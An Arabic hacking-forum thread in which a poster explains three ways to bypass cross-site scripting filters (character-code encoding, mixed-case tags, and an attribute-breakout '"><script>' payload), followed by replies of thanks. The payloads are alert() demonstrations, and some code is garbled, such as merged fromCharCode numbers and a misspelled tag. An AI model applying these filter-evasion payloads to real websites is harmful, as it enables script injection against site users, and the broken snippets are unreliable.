1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Hacker-DZ | المشاهدات : 577 | الردود : 7
حالة الموضوع:
مغلق
  1. Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة


    [​IMG]

    [​IMG]

    الموضوع اليوم يتحدث عن تخطى فلترة xss

    1 - تخطى الـ magic quots

    2 - تخطى اـ (التشويش ) Obfuscation

    3 - تمويه على الكود المحقون injected code

    [​IMG]

    1 - تخطى الـ magic quots

    كلنا نعرف هذه لحماية وهى اضافة slash الى الاقتباس الاحادى (') او الثنائى (")

    طيب عن حقن الكود اذا كان on فلن يشتغل الكود المحقون

    طريقة التخطى :

    تكون عن طريق تشفير النص الى ascii

    مثلا لو بدى اظهر alert() يحتوى على كلمة "pwned"

    هيكون تشفيرته كالاتى (112, 119, 110, 101, 100)

    الكود الذى سيتم حقنه

    كود PHP:
    <script>
    var 
    joy String.fromCharCode(112119110101100)
    alert(joy);
    </script>
    الناج هيكون alert تحتوى على كلمة pwned :D

    [​IMG]

    [​IMG]

    2 - تخطى اـ (التشويش ) Obfuscation

    حماية التشويش هى منع بعض الكلمات مثل

    <script>

    alert

    document.write()

    طريقة التخطى :

    التلاعب بالحروف مثلا :

    كود PHP:
    <sCrIpr>AlErt("pwned")</sCrIpr>
    [​IMG]

    [​IMG]

    3 - تمويه على الكود المحقون injected code

    بعض الحمايات تعمل على فحص اول حروف او رموز فى المدخلات

    مثلا يشوف بداية الكود او الجلة المدخلة ويفحصها

    طريقة التخطى :

    كود PHP:
    "><script>alert("pwned");</script>
    [​IMG]

    [​IMG]

    [​IMG]
     
  2. Dr.Azoz Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    |K|S|A|
    نظام التشغيل:
    windows 8.1
    رد: تخطى فلترة bypass xss filters - xss

    تسلم اخي وبارك الله فيك :{1}:
     
  3. STAY ALIVE Active DeveloPer

    الأنتساب:
    ‏22 أكتوبر 2012
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تخطى فلترة bypass xss filters - xss

    بارك الله فيك اخي الغالي
     
  4. osaod Developer

    الأنتساب:
    ‏19 نوفمبر 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: تخطى فلترة bypass xss filters - xss

    آلله يعططيكك ألعـأأفيةةة ..
     
  5. لـ حظة غ ـيآبك Developer

    الأنتساب:
    ‏28 فبراير 2013
    المشاركات:
    75
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    رد: تخطى فلترة bypass xss filters - xss

    و عليكم السلا و رحمة الله وبركاته

    بارك الله فيك اخوي

    واصل ابداعك ولا ترحمنا من جديدك
     
  6. هجمه مرتده Developer

    الأنتساب:
    ‏12 يونيو 2012
    المشاركات:
    46
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python
    رد: تخطى فلترة bypass xss filters - xss

    مبدع عااشت ايدك
     
  7. jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    نظام التشغيل:
    Linux
    رد: تخطى فلترة bypass xss filters - xss

    الله يعطيكك العافيةة حبيبي ~

    مبدع بمعنى الكلمةة واصل ابداعك
     
  8. TOU-DZ Developer

    الأنتساب:
    ‏28 نوفمبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    Ą Ļ Ģ ę я Ί Ǻ
    رد: تخطى فلترة bypass xss filters - xss

    ابدعت بارك الله فيك ُ;)ًٌُ
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة